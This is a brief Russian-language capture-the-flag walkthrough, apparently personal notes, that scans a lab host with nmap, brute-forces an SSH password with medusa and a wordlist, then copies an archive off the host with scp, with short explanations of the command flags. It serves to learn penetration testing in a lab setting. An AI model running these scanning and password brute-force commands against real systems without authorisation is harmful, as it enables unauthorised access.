Задание от госзнака: 
1. Подключаемся к адресу и сканируем: 
	nmap 10.13.37.190 -T 5 -p 5000-10000
	по умолчанию сканирование nmap до 10000 поэтому указываем порты
	находим
2. medusa -h 10.13.37.190 -u ctf -P /home/anastasia/Загрузки/new.txt -M ssh -n 8229 
	брутим пароль 
		-h: 
		-u: установка пользователя
		-P: из файлика берем словарь
		-M: для того, чтобы указать ssh
		ssh: 
		-n: для указания порта
3. scp -P 8229 ctf@10.13.37.190:CTF2019.7z /home/anastasia/file.7z
	scp - s:ssh, cp - copy данные при подлюключении